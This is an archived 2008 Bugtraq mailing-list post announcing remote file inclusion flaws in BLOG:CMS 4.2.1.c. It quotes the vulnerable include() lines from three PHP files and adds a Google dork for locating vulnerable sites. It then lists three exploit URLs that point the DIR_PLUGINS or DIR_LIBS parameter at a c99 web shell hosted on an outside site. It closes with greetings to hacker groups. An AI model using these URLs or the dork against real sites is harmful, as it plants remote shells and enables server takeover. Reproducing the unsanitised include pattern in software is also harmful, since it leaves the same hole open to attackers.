lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BLU125-W859048E300BA629BEE8F7DF3D0@phx.gbl>
Date: Mon, 21 Jan 2008 05:49:56 +0300
From: رومانسي هكر <rxhr@...mail.com>
To: <bugtraq@...urityfocus.com>
Subject: BLOG:CMS 4.2.1.c (DIR_PLUGINS)  Multiple Remote File Include


# Name : BLOG:CMS 4.2.1.c (DIR_PLUGINS)  Multiple Remote File Include
# Download From : http://dfn.dl.sourceforge.net/sourceforge/blogcms/blogcms.4.2.1.c.7z
Or Here http://blogcms.com
# Found By : RoMaNcYxHaCkEr                  We Are H-T TeaM (Houssamix - ToXiC)
# Home Page : Not Yet :(     Tryag.cc/cc        No-Hack.net     V99x.com/vb               Hackteach.org/cc
Google Dork : Powered by  Personal Content Management System © 2003-2005 Radek Hul?n     

============================================================================

# Vulne Code In Files index.php & media.php & server.php :

index.php In Line 19 :

include($DIR_PLUGINS."related/nusoap.php");

media.php In Line 32 :

include($DIR_LIBS . 'MEDIA.php');

server.php In Line 69 :

include($DIR_LIBS . "xmlrpc.inc.php");
include($DIR_LIBS . "xmlrpcs.inc.php");

# Exploit :

http://Www.RxH.CoM/blogcms/index.php?DIR_PLUGINS=http://no-hack.net/shells/c99.txt?

http://Www.RxH.CoM/blogcms/admin/media.php?DIR_LIBS=http://no-hack.net/shells/c99.txt?

http://Www.RxH.CoM/blogcms/admin/xmlrpc/server.php?DIR_LIBS=http://no-hack.net/shells/c99.txt?

That,s It,s

Good Luck Everybody
============================================================================

# Greet To :

"Cold Z3ro My Master , !!Hack-back!!" (Hackteach.org)

Tryag TeaM :"Mahmood_ali , cRMINEL_NET , Mohajer22 , Dr-Ha!l , LoVeRs Hacker , Abdullah00 , Athabi Ker , Mr-Wolf ...etc"  (Tryag.com)

Hack15 TeaM :"GeNiUs-HaCkEr , Mr-AljoOOker , Mr-Shares , So9or , KsA HaCkEr ...etc" (V99x.com)

Sniper-Sa TeaM :"Sniper-sa , Golden-Hacker , Sho3ter , VerySecret , nOUR-Ice ....etc"(Sniper-sa.com)

Yee7 TeaM : "ShockShadow ( My Best Friend ), HoUrIcAn , ...etc"(Yee7.com)

H-T TeaM : " Houusamix , ToXiC "(no-hack.net)

Str0ck (Milw0rm.com)

Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye , AlQaTaRi , God-Father And All My Friends

# For Contact : RxH@...Mail.iT

# Note : Alwayse Don,t See In The Top To Feeling Pain In Your Neck !!!

Best Wishes

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ